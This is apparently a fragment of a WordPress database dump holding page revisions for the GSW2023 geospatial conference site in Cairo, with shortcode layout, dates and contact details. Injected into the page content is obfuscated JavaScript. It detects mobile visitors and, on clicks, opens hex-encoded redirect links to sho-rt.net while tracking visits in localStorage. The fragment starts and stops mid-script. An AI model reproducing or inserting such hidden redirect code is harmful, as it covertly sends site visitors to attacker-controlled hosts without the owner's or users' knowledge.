)|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 21:02:07','2022-11-09 21:02:07','',3066,'https://gsw2023.com/?p=3227',0,'revision','',0),
(3228,1,'2022-11-09 21:03:32','2022-11-09 21:03:32','<p>[vc_row css=\".vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]</p>\r\n<h2 style=\"text-align: justify; color: #311b92;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n<p>[rev_slider alias=\"gsw2023-1\" slidertitle=\"gsw23\"][/rev_slider]</p>\r\n<h3></h3>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\" css=\".vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668024005657{margin-top: 25px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner][vc_column_text]</p>\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n<p>[/vc_column_text][/vc_column_inner][/vc_row_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668017539766{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1668021106220{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\r\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\r\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): March 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668020788243{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668020734563{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPAER:SOON[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3162\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3220\" img_size=\"600x475\" alignment=\"center\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>INTERCONTINENTAL CAIRO SEMIRAMIS</strong></h4>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>MORE INFORMATION</strong></h4>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Office of the Vice President of the Academy for Graduate Studies and Scientific Research</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"vista_blue\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return 